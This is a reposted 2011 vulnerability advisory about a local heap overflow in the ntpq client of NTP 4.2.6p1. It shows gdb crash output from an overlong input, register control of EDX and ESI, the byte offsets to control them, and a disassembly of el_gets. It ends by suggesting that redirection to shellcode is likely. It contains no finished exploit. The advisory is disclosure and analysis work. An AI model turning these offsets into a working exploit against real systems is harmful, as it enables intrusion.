ExploitFixes
Linux NTP query client v4.2.6p1 Heap Overflow Vulnerability 2011-03-11 19:15:17

Linux NTP query client v4.2.6p1 Heap Overflow vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
vendor: http://www.ntp.org/
software: http://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.6p1.tar.gz
impact: minor/informational

There is a local heap overflow in the ntpq utility client that comes packaged in ntp-4.2.6p1-2.fc13.
Note: The binary is NOT suid/guid enabled on my system.
Nonetheless, it provides some fun/interesting analysis.

[email protected] ~]$ yum list installed | grep ntp
fontpackages-filesystem.noarch 1.44-1.fc13 @updates
ntp.i686 4.2.6p1-2.fc13 @updates
ntpdate.i686 4.2.6p1-2.fc13 @updates

[[email protected] ~]$ /usr/sbin/ntpq --version
ntpq - standard NTP query program - Ver. 4.2.6p1

[[email protected] ~]$ gdb /usr/sbin/ntpq
GNU gdb (GDB) Fedora (7.1-34.fc13)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /usr/sbin/ntpq...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install ntp-4.2.6p1-2.fc13.i686

(gdb) r
Starting program: /usr/sbin/ntpq
[Thread debugging using libthread_db enabled]
ntpq> AAAA {0x4ac} AAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
***Command `AAAA {0x4ac} AAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. 'unknown

Program received signal SIGSEGV, Segmentation fault.
0xb7fab60d in el_gets () from /usr/lib/libedit.so.0

(gdb) i r
eax 0xbffff32c -1073745108
ecx 0x0 0
edx 0x42424242 1111638594 < ---- full control
ebx 0xb7fc5ac0 -1208198464
esp 0xbffff260 0xbffff260
ebp 0xbffff2c8 0xbffff2c8
esi 0x43434343 1128481603 < ---- full control
edi 0xbffff32c -1073745108
eip 0xb7fab60d 0xb7fab60d <el_gets+45>
eflags 0x10282 [ SF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

pointers are everywhere, look @ esp, esp+0x4 and esp+0x10 we can see a pointers
to some controllable memory:

(gdb) x/5x $esp
0xbffff260: 0x0015b948 0x0015b948 0xbffff2c8 0x0012bd06
0xbffff270: 0x0015b948

(gdb) x/30x 0x0015b948
0x15b948: 0x41414141 0x41414141 0x41414141 0x41414141
0x15b958: 0x41414141 0x41414141 0x41414141 0x41414141
0x15b968: 0x41414141 0x41414141 0x41414141 0x41414141
0x15b978: 0x41414141 0x41414141 0x41414141 0x41414141
0x15b988: 0x41414141 0x41414141 0x41414141 0x41414141
0x15b998: 0x41414141 0x41414141 0x41414141 0x41414141
0x15b9a8: 0x41414141 0x41414141 0x41414141 0x41414141
0x15b9b8: 0x41414141 0x41414141

(gdb) bt
#0 0xb7fab60d in el_gets () from /usr/lib/libedit.so.0
#1 0x0012c7b0 in ?? ()
#2 0x001196a3 in ?? ()
#3 0x0011978c in main ()

(gdb) disas 0xb7fab60d
Dump of assembler code for function el_gets:
0xb7fab5e0 <+0>: push %ebp
0xb7fab5e1 <+1>: mov %esp,%ebp
0xb7fab5e3 <+3>: push %edi
0xb7fab5e4 <+4>: push %esi
0xb7fab5e5 <+5>: lea -0x20(%ebp),%eax
0xb7fab5e8 <+8>: push %ebx
0xb7fab5e9 <+9>: call 0xb7fa5469
0xb7fab5ee <+14>: add $0x1a4d2,%ebx
0xb7fab5f4 <+20>: lea -0x5c(%esp),%esp
0xb7fab5f8 <+24>: mov 0xc(%ebp),%edi
0xb7fab5fb <+27>: test %edi,%edi
0xb7fab5fd <+29>: mov 0x8(%ebp),%esi
0xb7fab600 <+32>: cmovne 0xc(%ebp),%eax
0xb7fab604 <+36>: mov %eax,0xc(%ebp)
0xb7fab607 <+39>: movl $0x0,(%eax)
=> 0xb7fab60d <+45>: mov 0x14(%esi),%eax
0xb7fab610 <+48>: test $0x2,%al
0xb7fab612 <+50>: je 0xb7fab6b0 <el_gets+208>
0xb7fab618 <+56>: mov 0x30(%esi),%edi
0xb7fab61b <+59>: mov %edi,0x4(%esp)
0xb7fab61f <+63>: mov %esi,(%esp)
0xb7fab622 <+66>: call *0x324(%esi)
0xb7fab628 <+72>: cmp $0x1,%eax
0xb7fab62b <+75>: mov %eax,%ecx
0xb7fab62d <+77>: jne 0xb7faba50 <el_gets+1136>
0xb7fab633 <+83>: lea 0x1(%edi),%edx
0xb7fab636 <+86>: cmp 0x3c(%esi),%edx
0xb7fab639 <+89>: jae 0xb7fab680 <el_gets+160>
0xb7fab63b <+91>: mov %edi,%eax
0xb7fab63d <+93>: mov %edx,%edi
0xb7fab63f <+95>: testb $0x8,0x14(%esi)
0xb7fab643 <+99>: jne 0xb7fab650 <el_gets+112>
0xb7fab645 <+101>: movzbl (%eax),%eax
0xb7fab648 <+104>: cmp $0xa,%al
0xb7fab64a <+106>: je 0xb7fab650 <el_gets+112>
0xb7fab64c <+108>: cmp $0xd,%al
---Type <return> to continue, or q <return> to quit---

The code access violates at 'mov eax, dword ptr [%esi+20]'. A this point, the EAX register can be controlled
by setting a valid rw memory address into ESI+20. This will trigger a deference @ 0xb7fab60d and the value
of whatever is contained within ESI+20 will written to EAX. The offset to controlling EDX is 1204 bytes
and the offset to ESI is 1212 bytes.

In summary, it is likley that the execution flow can be redirected to desired shellcode.

~ mr_me